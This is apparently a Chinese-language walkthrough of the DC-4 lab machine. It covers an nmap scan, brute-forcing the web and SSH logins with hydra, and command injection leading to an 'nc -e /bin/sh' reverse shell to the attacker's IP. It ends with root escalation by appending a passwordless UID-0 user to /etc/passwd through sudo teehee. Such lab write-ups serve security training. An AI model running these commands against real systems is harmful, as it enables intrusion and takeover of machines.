DC-4
关于环境的搭建 , 大家可以自行百度
网络桥接
渗透机 kali
靶机 dc-4
0x01. 信息收集
老规矩就是那一套 , 然后找到靶机的真实ip , 扫描一下全端口
nmap 192.168.0.151
可以看到只开放了 80 和 22端口 , 访问一下80端口
是一个admin登录页面 , 可以看到是没有验证码的 , 尝试暴力破解 , 拿出我的大字典 , 最终爆出来是
admin happy
0x02. 漏洞发现和利用
1. 获取shell
然后登录进入会发现有一个命令执行的漏洞
抓包 , 改包 , 尝试修改参数 , 发现果然有命令执行漏洞
一般linux(nmap扫一下)上都有nc , 我们通过nc反弹一个shell
nc -e /bin/sh 192.168.0.110 4445
然后通过python进入交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
通过查看/etc/passwd文件 , 发现有
既然有三个用户 , 那么就分别进去看看家目录下有什么 , 一般靶机的hint都喜欢在家目录下 , 最后在jim的家目录
下发现了 backups
然后在里面发现了以前的老密码
然后使用hydra尝试对那三个用户爆破
hydra -L user.dic -P passwd.txt -vV -f 192.168.0.151 ssh
爆出一个账号的密码
jim
jibril04
然后ssh连接 , 在登录信息后有一个mail
find / -name "mail" 找寻名字叫mail的 , 搜索的结果是/var/mail
在里面发现了charles给他发的邮件 , 里面有他的密码 , 切换用户charles
2. 提权
sudo -l
发现了一个teehee命令 , 这个命令可以往一个文件追加内容 , 可以通过他向/etc/passwd写入文件
echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
#如:admin:x:0:0::/home/admin:/bin/bash #[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]
切换test用户 , 拿到最后的flag
0x03. 总结
1. fuzzing测试2.nc 反弹shell3. 交互式shell4. 提权